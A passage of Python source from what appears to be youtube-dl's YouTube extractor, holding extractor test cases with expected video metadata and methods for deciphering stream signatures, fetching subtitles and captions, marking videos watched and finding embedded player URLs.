'title': 'Icona Pop - I Love It (feat. Charli XCX) [OFFICIAL VIDEO]',
'alt_title': 'I Love It (feat. Charli XCX)',
'description': 'md5:f3ceb5ef83a08d95b9d146f973157cc8',
'tags': ['Icona Pop i love it', 'sweden', 'pop music', 'big beat records', 'big beat', 'charli',
'xcx', 'charli xcx', 'girls', 'hbo', 'i love it', "i don't care", 'icona', 'pop',
'iconic ep', 'iconic', 'love', 'it'],
'duration': 180,
'uploader': 'Icona Pop',
'uploader_id': 'IconaPop',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IconaPop',
'creator': 'Icona Pop',
'track': 'I Love It (feat. Charli XCX)',
'artist': 'Icona Pop',
}
},
{
'url': 'https://www.youtube.com/watch?v=07FYdnEawAQ',
'note': 'Test VEVO video with age protection (#956)',
'info_dict': {
'id': '07FYdnEawAQ',
'ext': 'mp4',
'upload_date': '20130703',
'title': 'Justin Timberlake - Tunnel Vision (Official Music Video) (Explicit)',
'alt_title': 'Tunnel Vision',
'description': 'md5:07dab3356cde4199048e4c7cd93471e1',
'duration': 419,
'uploader': 'justintimberlakeVEVO',
'uploader_id': 'justintimberlakeVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/justintimberlakeVEVO',
'creator': 'Justin Timberlake',
'track': 'Tunnel Vision',
'artist': 'Justin Timberlake',
'age_limit': 18,
}
},
{
'url': '//www.YouTube.com/watch?v=yZIXLfi8CZQ',
'note': 'Embed-only video (#1746)',
'info_dict': {
'id': 'yZIXLfi8CZQ',
'ext': 'mp4',
'upload_date': '20120608',
'title': 'Principal Sexually Assaults A Teacher - Episode 117 - 8th June 2012',
'description': 'md5:09b78bd971f1e3e289601dfba15ca4f7',
'uploader': 'SET India',
'uploader_id': 'setindia',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/setindia',
'age_limit': 18,
}
},
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&v=UxxajLWwzqY',
'note': 'Use the first video ID in the URL',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'upload_date': '20121002',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact phihag@phihag.de .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'view_count': int,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?v=a9LDPn-MO4I',
'note': '256k DASH audio (format 141) via DASH manifest',
'info_dict': {
'id': 'a9LDPn-MO4I',
'ext': 'm4a',
'upload_date': '20121002',
'uploader_id': '8KVIDEO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/8KVIDEO',
'description': '',
'uploader': '8KVIDEO',
'title': 'UHDTV TEST 8K VIDEO.mp4'
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141',
},
'skip': 'format 141 not served anymore',
},
# DASH manifest with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=IB3lcPjvWLA',
'info_dict': {
'id': 'IB3lcPjvWLA',
'ext': 'm4a',
'title': 'Afrojack, Spree Wilson - The Spark (Official Music Video) ft. Spree Wilson',
'description': 'md5:8f5e2b82460520b619ccac1f509d43bf',
'duration': 244,
'uploader': 'AfrojackVEVO',
'uploader_id': 'AfrojackVEVO',
'upload_date': '20131011',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# JS player signature function name containing $
{
'url': 'https://www.youtube.com/watch?v=nfWlot6h_JM',
'info_dict': {
'id': 'nfWlot6h_JM',
'ext': 'm4a',
'title': 'Taylor Swift - Shake It Off',
'description': 'md5:bec2185232c05479482cb5a9b82719bf',
'duration': 242,
'uploader': 'TaylorSwiftVEVO',
'uploader_id': 'TaylorSwiftVEVO',
'upload_date': '20140818',
'creator': 'Taylor Swift',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# Controversy video
{
'url': 'https://www.youtube.com/watch?v=T4XJQO3qol8',
'info_dict': {
'id': 'T4XJQO3qol8',
'ext': 'mp4',
'duration': 219,
'upload_date': '20100909',
'uploader': 'Amazing Atheist',
'uploader_id': 'TheAmazingAtheist',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheAmazingAtheist',
'title': 'Burning Everyone\'s Koran',
'description': 'SUBSCRIBE: http://www.youtube.com/saturninefilms\n\nEven Obama has taken a stand against freedom on this issue: http://www.huffingtonpost.com/2010/09/09/obama-gma-interview-quran_n_710282.html',
}
},
# Normal age-gate video (No vevo, embed allowed)
{
'url': 'https://youtube.com/watch?v=HtVdAasjOgU',
'info_dict': {
'id': 'HtVdAasjOgU',
'ext': 'mp4',
'title': 'The Witcher 3: Wild Hunt - The Sword Of Destiny Trailer',
'description': r're:(?s).{100,}About the Game\n.*?The Witcher 3: Wild Hunt.{100,}',
'duration': 142,
'uploader': 'The Witcher',
'uploader_id': 'WitcherGame',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/WitcherGame',
'upload_date': '20140605',
'age_limit': 18,
},
},
# Age-gate video with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=6kLq3WMV1nU',
'info_dict': {
'id': '6kLq3WMV1nU',
'ext': 'mp4',
'title': 'Dedication To My Ex (Miss That) (Lyric Video)',
'description': 'md5:33765bb339e1b47e7e72b5490139bb41',
'duration': 246,
'uploader': 'LloydVEVO',
'uploader_id': 'LloydVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/LloydVEVO',
'upload_date': '20110629',
'age_limit': 18,
},
},
# video_info is None (https://github.com/ytdl-org/youtube-dl/issues/4421)
# YouTube Red ad is not captured for creator
{
'url': '__2ABJjxzNo',
'info_dict': {
'id': '__2ABJjxzNo',
'ext': 'mp4',
'duration': 266,
'upload_date': '20100430',
'uploader_id': 'deadmau5',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/deadmau5',
'creator': 'deadmau5',
'description': 'md5:12c56784b8032162bb936a5f76d55360',
'uploader': 'deadmau5',
'title': 'Deadmau5 - Some Chords (HD)',
'alt_title': 'Some Chords',
},
'expected_warnings': [
'DASH manifest missing',
]
},
# Olympics (https://github.com/ytdl-org/youtube-dl/issues/4431)
{
'url': 'lqQg6PlCWgI',
'info_dict': {
'id': 'lqQg6PlCWgI',
'ext': 'mp4',
'duration': 6085,
'upload_date': '20150827',
'uploader_id': 'olympic',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/olympic',
'description': 'HO09 - Women - GER-AUS - Hockey - 31 July 2012 - London 2012 Olympic Games',
'uploader': 'Olympic',
'title': 'Hockey - Women - GER-AUS - London 2012 Olympic Games',
},
'params': {
'skip_download': 'requires avconv',
}
},
# Non-square pixels
{
'url': 'https://www.youtube.com/watch?v=_b-2C3KPAM0',
'info_dict': {
'id': '_b-2C3KPAM0',
'ext': 'mp4',
'stretched_ratio': 16 / 9.,
'duration': 85,
'upload_date': '20110310',
'uploader_id': 'AllenMeow',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/AllenMeow',
'description': 'made by Wacom from Korea | 字幕&加油添醋 by TY\'s Allen | 感謝heylisa00cavey1001同學熱情提供梗及翻譯',
'uploader': '孫ᄋᄅ',
'title': '[A-made] 變態妍字幕版 太妍 我就是這樣的人',
},
},
# url_encoded_fmt_stream_map is empty string
{
'url': 'qEJwOuvDf7I',
'info_dict': {
'id': 'qEJwOuvDf7I',
'ext': 'webm',
'title': 'Обсуждение судебной практики по выборам 14 сентября 2014 года в Санкт-Петербурге',
'description': '',
'upload_date': '20150404',
'uploader_id': 'spbelect',
'uploader': 'Наблюдатели Петербурга',
},
'params': {
'skip_download': 'requires avconv',
},
'skip': 'This live event has ended.',
},
# Extraction from multiple DASH manifests (https://github.com/ytdl-org/youtube-dl/pull/6097)
{
'url': 'https://www.youtube.com/watch?v=FIl7x6_3R5Y',
'info_dict': {
'id': 'FIl7x6_3R5Y',
'ext': 'webm',
'title': 'md5:7b81415841e02ecd4313668cde88737a',
'description': 'md5:116377fd2963b81ec4ce64b542173306',
'duration': 220,
'upload_date': '20150625',
'uploader_id': 'dorappi2000',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/dorappi2000',
'uploader': 'dorappi2000',
'formats': 'mincount:31',
},
'skip': 'not actual anymore',
},
# DASH manifest with segment_list
{
'url': 'https://www.youtube.com/embed/CsmdDsKjzN8',
'md5': '8ce563a1d667b599d21064e982ab9e31',
'info_dict': {
'id': 'CsmdDsKjzN8',
'ext': 'mp4',
'upload_date': '20150501', # According to '<meta itemprop="datePublished"', but in other places it's 20150510
'uploader': 'Airtek',
'description': 'Retransmisión en directo de la XVIII media maratón de Zaragoza.',
'uploader_id': 'UCzTzUmjXxxacNnL8I3m4LnQ',
'title': 'Retransmisión XVIII Media maratón Zaragoza 2015',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '135', # bestvideo
},
'skip': 'This live event has ended.',
},
{
# Multifeed videos (multiple cameras), URL is for Main Camera
'url': 'https://www.youtube.com/watch?v=jqWvoWXjCVs',
'info_dict': {
'id': 'jqWvoWXjCVs',
'title': 'teamPGP: Rocket League Noob Stream',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
},
'playlist': [{
'info_dict': {
'id': 'jqWvoWXjCVs',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (Main Camera)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7335,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': '6h8e8xoXJzg',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (kreestuh)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'PUOgX5z9xZw',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (grizzle)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'teuwxikvS5k',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (zim)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7334,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}],
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
},
{
# Multifeed video with comma in title (see https://github.com/ytdl-org/youtube-dl/issues/8536)
'url': 'https://www.youtube.com/watch?v=gVfLd0zydlo',
'info_dict': {
'id': 'gVfLd0zydlo',
'title': 'DevConf.cz 2016 Day 2 Workshops 1 14:00 - 15:30',
},
'playlist_count': 2,
'skip': 'Not multifeed anymore',
},
{
'url': 'https://vid.plus/FlRa-iH7PGw',
'only_matching': True,
},
{
'url': 'https://zwearz.com/watch/9lWxNJF-ufM/electra-woman-dyna-girl-official-trailer-grace-helbig.html',
'only_matching': True,
},
{
# Title with JS-like syntax "};" (see https://github.com/ytdl-org/youtube-dl/issues/7468)
# Also tests cut-off URL expansion in video description (see
# https://github.com/ytdl-org/youtube-dl/issues/1892,
# https://github.com/ytdl-org/youtube-dl/issues/8164)
'url': 'https://www.youtube.com/watch?v=lsguqyKfVQg',
'info_dict': {
'id': 'lsguqyKfVQg',
'ext': 'mp4',
'title': '{dark walk}; Loki/AC/Dishonored; collab w/Elflover21',
'alt_title': 'Dark Walk - Position Music',
'description': 'md5:8085699c11dc3f597ce0410b0dcbb34a',
'duration': 133,
'upload_date': '20151119',
'uploader_id': 'IronSoulElf',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IronSoulElf',
'uploader': 'IronSoulElf',
'creator': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
'track': 'Dark Walk - Position Music',
'artist': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
},
'params': {
'skip_download': True,
},
},
{
# Tags with '};' (see https://github.com/ytdl-org/youtube-dl/issues/7468)
'url': 'https://www.youtube.com/watch?v=Ms7iBXnlUO8',
'only_matching': True,
},
{
# Video with yt:stretch=17:0
'url': 'https://www.youtube.com/watch?v=Q39EVAstoRM',
'info_dict': {
'id': 'Q39EVAstoRM',
'ext': 'mp4',
'title': 'Clash Of Clans#14 Dicas De Ataque Para CV 4',
'description': 'md5:ee18a25c350637c8faff806845bddee9',
'upload_date': '20151107',
'uploader_id': 'UCCr7TALkRbo3EtFzETQF1LA',
'uploader': 'CH GAMER DROID',
},
'params': {
'skip_download': True,
},
'skip': 'This video does not exist.',
},
{
# Video licensed under Creative Commons
'url': 'https://www.youtube.com/watch?v=M4gD1WSo5mA',
'info_dict': {
'id': 'M4gD1WSo5mA',
'ext': 'mp4',
'title': 'md5:e41008789470fc2533a3252216f1c1d1',
'description': 'md5:a677553cf0840649b731a3024aeff4cc',
'duration': 721,
'upload_date': '20150127',
'uploader_id': 'BerkmanCenter',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/BerkmanCenter',
'uploader': 'The Berkman Klein Center for Internet & Society',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
# Channel-like uploader_url
'url': 'https://www.youtube.com/watch?v=eQcmzGIKrzg',
'info_dict': {
'id': 'eQcmzGIKrzg',
'ext': 'mp4',
'title': 'Democratic Socialism and Foreign Policy | Bernie Sanders',
'description': 'md5:dda0d780d5a6e120758d1711d062a867',
'duration': 4060,
'upload_date': '20151119',
'uploader': 'Bernie Sanders',
'uploader_id': 'UCH1dpzjCEiGAt8CXkryhkZg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCH1dpzjCEiGAt8CXkryhkZg',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?feature=player_embedded&amp;v=V36LpHqtcDY',
'only_matching': True,
},
{
# YouTube Red paid video (https://github.com/ytdl-org/youtube-dl/issues/10059)
'url': 'https://www.youtube.com/watch?v=i1Ko8UG-Tdo',
'only_matching': True,
},
{
# Rental video preview
'url': 'https://www.youtube.com/watch?v=yYr8q0y5Jfg',
'info_dict': {
'id': 'uGpuVWrhIzE',
'ext': 'mp4',
'title': 'Piku - Trailer',
'description': 'md5:c36bd60c3fd6f1954086c083c72092eb',
'upload_date': '20150811',
'uploader': 'FlixMatrix',
'uploader_id': 'FlixMatrixKaravan',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/FlixMatrixKaravan',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
},
{
# YouTube Red video with episode data
'url': 'https://www.youtube.com/watch?v=iqKdEhx-dD4',
'info_dict': {
'id': 'iqKdEhx-dD4',
'ext': 'mp4',
'title': 'Isolation - Mind Field (Ep 1)',
'description': 'md5:46a29be4ceffa65b92d277b93f463c0f',
'duration': 2085,
'upload_date': '20170118',
'uploader': 'Vsauce',
'uploader_id': 'Vsauce',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/Vsauce',
'series': 'Mind Field',
'season_number': 1,
'episode_number': 1,
},
'params': {
'skip_download': True,
},
'expected_warnings': [
'Skipping DASH manifest',
],
},
{
# The following content has been identified by the YouTube community
# as inappropriate or offensive to some audiences.
'url': 'https://www.youtube.com/watch?v=6SJNVb0GnPI',
'info_dict': {
'id': '6SJNVb0GnPI',
'ext': 'mp4',
'title': 'Race Differences in Intelligence',
'description': 'md5:5d161533167390427a1f8ee89a1fc6f1',
'duration': 965,
'upload_date': '20140124',
'uploader': 'New Century Foundation',
'uploader_id': 'UCEJYpZGqgUob0zVVEaLhvVg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCEJYpZGqgUob0zVVEaLhvVg',
},
'params': {
'skip_download': True,
},
},
{
# itag 212
'url': '1t24XAntNCY',
'only_matching': True,
},
{
# geo restricted to JP
'url': 'sJL6WA-aGkQ',
'only_matching': True,
},
{
'url': 'https://www.youtube.com/watch?v=MuAGGZNfUkU&list=RDMM',
'only_matching': True,
},
{
'url': 'https://invidio.us/watch?v=BaW_jenozKc',
'only_matching': True,
},
{
# DRM protected
'url': 'https://www.youtube.com/watch?v=s7_qI6_mIXc',
'only_matching': True,
},
{
# Video with unsupported adaptive stream type formats
'url': 'https://www.youtube.com/watch?v=Z4Vy8R84T1U',
'info_dict': {
'id': 'Z4Vy8R84T1U',
'ext': 'mp4',
'title': 'saman SMAN 53 Jakarta(Sancety) opening COFFEE4th at SMAN 53 Jakarta',
'description': 'md5:d41d8cd98f00b204e9800998ecf8427e',
'duration': 433,
'upload_date': '20130923',
'uploader': 'Amelia Putri Harwita',
'uploader_id': 'UCpOxM49HJxmC1qCalXyB3_Q',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCpOxM49HJxmC1qCalXyB3_Q',
'formats': 'maxcount:10',
},
'params': {
'skip_download': True,
'youtube_include_dash_manifest': False,
},
}
]
def __init__(self, *args, **kwargs):
super(YoutubeIE, self).__init__(*args, **kwargs)
self._player_cache = {}
def report_video_info_webpage_download(self, video_id):
"""Report attempt to download video info webpage."""
self.to_screen('%s: Downloading video info webpage' % video_id)
def report_information_extraction(self, video_id):
"""Report attempt to extract video information."""
self.to_screen('%s: Extracting video information' % video_id)
def report_unavailable_format(self, video_id, format):
"""Report extracted video URL."""
self.to_screen('%s: Format %s not available' % (video_id, format))
def report_rtmp_download(self):
"""Indicate the download will use the RTMP protocol."""
self.to_screen('RTMP download detected')
def _signature_cache_id(self, example_sig):
""" Return a string representation of a signature """
return '.'.join(compat_str(len(part)) for part in example_sig.split('.'))
def _extract_signature_function(self, video_id, player_url, example_sig):
id_m = re.match(
r'.*?-(?P<id>[a-zA-Z0-9_-]+)(?:/watch_as3|/html5player(?:-new)?|(?:/[a-z]{2,3}_[A-Z]{2})?/base)?\.(?P<ext>[a-z]+)$',
player_url)
if not id_m:
raise ExtractorError('Cannot identify player %r' % player_url)
player_type = id_m.group('ext')
player_id = id_m.group('id')
# Read from filesystem cache
func_id = '%s_%s_%s' % (
player_type, player_id, self._signature_cache_id(example_sig))
assert os.path.basename(func_id) == func_id
cache_spec = self._downloader.cache.load('youtube-sigfuncs', func_id)
if cache_spec is not None:
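# cache_spec is a list of indices into the scrambled signature: position i
# of the deciphered signature is taken from s[cache_spec[i]]. For example,
# a spec of [2, 0, 1] maps 'abc' to 'cab'.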
return lambda s: ''.join(s[i] for i in cache_spec)
download_note = (
'Downloading player %s' % player_url
if self._downloader.params.get('verbose') else
'Downloading %s player %s' % (player_type, player_id)
)
if player_type == 'js':
code = self._download_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
res = self._parse_sig_js(code)
elif player_type == 'swf':
urlh = self._request_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
code = urlh.read()
res = self._parse_sig_swf(code)
else:
assert False, 'Invalid player type %r' % player_type
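# Record the transformation as a permutation: run the extracted function once
# on the string chr(0)chr(1)... so that the ord() of each output character
# reveals which input position it came from. The resulting index list is
# cached and replayed cheaply for every signature with this length pattern.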
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = res(test_string)
cache_spec = [ord(c) for c in cache_res]
self._downloader.cache.store('youtube-sigfuncs', func_id, cache_spec)
return res
def _print_sig_code(self, func, example_sig):
def gen_sig_code(idxs):
def _genslice(start, end, step):
starts = '' if start == 0 else str(start)
ends = (':%d' % (end + step)) if end + step >= 0 else ':'
steps = '' if step == 1 else (':%d' % step)
return 's[%s%s%s]' % (starts, ends, steps)
step = None
# Quell pyflakes warnings - start will be set when step is set
start = '(Never used)'
for i, prev in zip(idxs[1:], idxs[:-1]):
if step is not None:
if i - prev == step:
continue
yield _genslice(start, prev, step)
step = None
continue
if i - prev in [-1, 1]:
step = i - prev
start = prev
continue
else:
yield 's[%d]' % prev
if step is None:
yield 's[%d]' % i
else:
yield _genslice(start, i, step)
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = func(test_string)
cache_spec = [ord(c) for c in cache_res]
expr_code = ' + '.join(gen_sig_code(cache_spec))
signature_id_tuple = '(%s)' % (
', '.join(compat_str(len(p)) for p in example_sig.split('.')))
code = ('if tuple(len(p) for p in s.split(\'.\')) == %s:\n'
' return %s\n') % (signature_id_tuple, expr_code)
self.to_screen('Extracted signature function:\n' + code)
def _parse_sig_js(self, jscode):
funcname = self._search_regex(
(r'(["\'])signature\1\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\.sig\|\|(?P<sig>[a-zA-Z0-9$]+)\(',
r'yt\.akamaized\.net/\)\s*\|\|\s*.*?\s*c\s*&&\s*d\.set\([^,]+\s*,\s*(?:encodeURIComponent\s*\()?(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*d\.set\([^,]+\s*,\s*(?:encodeURIComponent\s*\()?\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*d\.set\([^,]+\s*,\s*\([^)]*\)\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\('),
jscode, 'Initial JS player signature function name', group='sig')
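# The deciphering routine usually has a short obfuscated name (possibly
# containing '$'); JSInterpreter evaluates its definition so the scrambled
# signature can be unscrambled in pure Python without a JS runtime.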
jsi = JSInterpreter(jscode)
initial_function = jsi.extract_function(funcname)
return lambda s: initial_function([s])
def _parse_sig_swf(self, file_contents):
swfi = SWFInterpreter(file_contents)
TARGET_CLASSNAME = 'SignatureDecipher'
searched_class = swfi.extract_class(TARGET_CLASSNAME)
initial_function = swfi.extract_function(searched_class, 'decipher')
return lambda s: initial_function([s])
def _decrypt_signature(self, s, video_id, player_url, age_gate=False):
"""Turn the encrypted s field into a working signature"""
if player_url is None:
raise ExtractorError('Cannot decrypt signature without player_url')
if player_url.startswith('//'):
player_url = 'https:' + player_url
elif not re.match(r'https?://', player_url):
player_url = compat_urlparse.urljoin(
'https://www.youtube.com', player_url)
try:
player_id = (player_url, self._signature_cache_id(s))
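# Signatures with the same length pattern coming from the same player are
# assumed to use the same scrambling function, so the extracted function is
# cached per (player_url, length pattern) pair.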
if player_id not in self._player_cache:
func = self._extract_signature_function(
video_id, player_url, s
)
self._player_cache[player_id] = func
func = self._player_cache[player_id]
if self._downloader.params.get('youtube_print_sig_code'):
self._print_sig_code(func, s)
return func(s)
except Exception as e:
tb = traceback.format_exc()
raise ExtractorError(
'Signature extraction failed: ' + tb, cause=e)
def _get_subtitles(self, video_id, webpage):
try:
subs_doc = self._download_xml(
'https://video.google.com/timedtext?hl=en&type=list&v=%s' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % error_to_compat_str(err))
return {}
sub_lang_list = {}
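# The type=list response is an XML document with one <track> element per
# available subtitle language; its lang_code and name attributes are used
# below to build one download URL per subtitle format.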
for track in subs_doc.findall('track'):
lang = track.attrib['lang_code']
if lang in sub_lang_list:
continue
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': lang,
'v': video_id,
'fmt': ext,
'name': track.attrib['name'].encode('utf-8'),
})
sub_formats.append({
'url': 'https://www.youtube.com/api/timedtext?' + params,
'ext': ext,
})
sub_lang_list[lang] = sub_formats
if not sub_lang_list:
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
return sub_lang_list
def _get_ytplayer_config(self, video_id, webpage):
patterns = (
# User data may contain arbitrary character sequences that can affect
# JSON extraction with regex, e.g. when '};' is contained the second
# regex won't capture the whole JSON. Work around this by trying the more
# specific regex first; proper quoted string handling, to be implemented
# in the future, will replace this workaround (see
# https://github.com/ytdl-org/youtube-dl/issues/7468,
# https://github.com/ytdl-org/youtube-dl/pull/7599)
r';ytplayer\.config\s*=\s*({.+?});ytplayer',
r';ytplayer\.config\s*=\s*({.+?});',
)
config = self._search_regex(
patterns, webpage, 'ytplayer.config', default=None)
if config:
return self._parse_json(
uppercase_escape(config), video_id, fatal=False)
def _get_automatic_captions(self, video_id, webpage):
"""We need the webpage for getting the captions url, pass it as an
argument to speed up the process."""
self.to_screen('%s: Looking for automatic captions' % video_id)
player_config = self._get_ytplayer_config(video_id, webpage)
err_msg = 'Couldn\'t find automatic captions for %s' % video_id
if not player_config:
self._downloader.report_warning(err_msg)
return {}
try:
args = player_config['args']
caption_url = args.get('ttsurl')
if caption_url:
timestamp = args['timestamp']
# We get the available subtitles
list_params = compat_urllib_parse_urlencode({
'type': 'list',
'tlangs': 1,
'asrs': 1,
})
list_url = caption_url + '&' + list_params
caption_list = self._download_xml(list_url, video_id)
original_lang_node = caption_list.find('track')
if original_lang_node is None:
self._downloader.report_warning('Video doesn\'t have automatic captions')
return {}
original_lang = original_lang_node.attrib['lang_code']
caption_kind = original_lang_node.attrib.get('kind', '')
sub_lang_list = {}
for lang_node in caption_list.findall('target'):
sub_lang = lang_node.attrib['lang_code']
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': original_lang,
'tlang': sub_lang,
'fmt': ext,
'ts': timestamp,
'kind': caption_kind,
})
sub_formats.append({
'url': caption_url + '&' + params,
'ext': ext,
})
sub_lang_list[sub_lang] = sub_formats
return sub_lang_list
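# make_captions rewrites the base caption URL for every requested translation
# language and subtitle format by updating the tlang/fmt query parameters.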
def make_captions(sub_url, sub_langs):
parsed_sub_url = compat_urllib_parse_urlparse(sub_url)
caption_qs = compat_parse_qs(parsed_sub_url.query)
captions = {}
for sub_lang in sub_langs:
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
caption_qs.update({
'tlang': [sub_lang],
'fmt': [ext],
})
sub_url = compat_urlparse.urlunparse(parsed_sub_url._replace(
query=compat_urllib_parse_urlencode(caption_qs, True)))
sub_formats.append({
'url': sub_url,
'ext': ext,
})
captions[sub_lang] = sub_formats
return captions
# New captions format as of 22.06.2017
player_response = args.get('player_response')
if player_response and isinstance(player_response, compat_str):
player_response = self._parse_json(
player_response, video_id, fatal=False)
if player_response:
renderer = player_response['captions']['playerCaptionsTracklistRenderer']
base_url = renderer['captionTracks'][0]['baseUrl']
sub_lang_list = []
for lang in renderer['translationLanguages']:
lang_code = lang.get('languageCode')
if lang_code:
sub_lang_list.append(lang_code)
return make_captions(base_url, sub_lang_list)
# Some videos don't provide ttsurl but rather caption_tracks and
# caption_translation_languages (e.g. 20LmZk1hakA)
# Not used anymore as of 22.06.2017
caption_tracks = args['caption_tracks']
caption_translation_languages = args['caption_translation_languages']
caption_url = compat_parse_qs(caption_tracks.split(',')[0])['u'][0]
sub_lang_list = []
for lang in caption_translation_languages.split(','):
lang_qs = compat_parse_qs(compat_urllib_parse_unquote_plus(lang))
sub_lang = lang_qs.get('lc', [None])[0]
if sub_lang:
sub_lang_list.append(sub_lang)
return make_captions(caption_url, sub_lang_list)
# An extractor error can be raised by the download process if there are
# no automatic captions but there are subtitles
except (KeyError, IndexError, ExtractorError):
self._downloader.report_warning(err_msg)
return {}
def _mark_watched(self, video_id, video_info, player_response):
playback_url = url_or_none(try_get(
player_response,
lambda x: x['playbackTracking']['videostatsPlaybackUrl']['baseUrl']) or try_get(
video_info, lambda x: x['videostats_playback_base_url'][0]))
if not playback_url:
return
parsed_playback_url = compat_urlparse.urlparse(playback_url)
qs = compat_urlparse.parse_qs(parsed_playback_url.query)
# The cpn generation algorithm is reverse-engineered from base.js.
# In fact it works even with a dummy cpn.
CPN_ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_'
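# Each of the 16 cpn characters is drawn from the 64-character URL-safe
# alphabet above; masking the random value with & 63 maps it onto a valid
# alphabet index.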
cpn = ''.join((CPN_ALPHABET[random.randint(0, 256) & 63] for _ in range(0, 16)))
qs.update({
'ver': ['2'],
'cpn': [cpn],
})
playback_url = compat_urlparse.urlunparse(
parsed_playback_url._replace(query=compat_urllib_parse_urlencode(qs, True)))
self._download_webpage(
playback_url, video_id, 'Marking watched',
'Unable to mark watched', fatal=False)
@staticmethod
def _extract_urls(webpage):
# Embedded YouTube player
entries = [
unescapeHTML(mobj.group('url'))
for mobj in re.finditer(r'''(?x)
(?:
<iframe[^>]+?src=|
data-video-url=|
<embed[^>]+?src=|
embedSWF\(?:\s*|
<object[^>]+data=|
new\s+SWFObject\(
)
(["\'])
(?P<url>(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/
(?:embed|v|p)/[0-9A-Za-z_-]{11}.*?)
\1''', webpage)]
# lazyYT YouTube embed
entries.extend(list(map(
unescapeHTML,
re.findall(r'class="lazyYT" data-youtube-id="([^"]+)"', webpage))))
# Wordpress "YouTube Video Importer" plugin
matches = re.findall(r'''(?x)<div[^>]+
class=(?P<q1>[\'"])[^\'"]*\byvii_single_video_player\b[^\'"]*(?P=q1)[^>]+
data-video_id=(?P<q2>[\'"])([^\'"]+)(?P=q2)''', webpage)
entries.extend(m[-1] for m in matches)
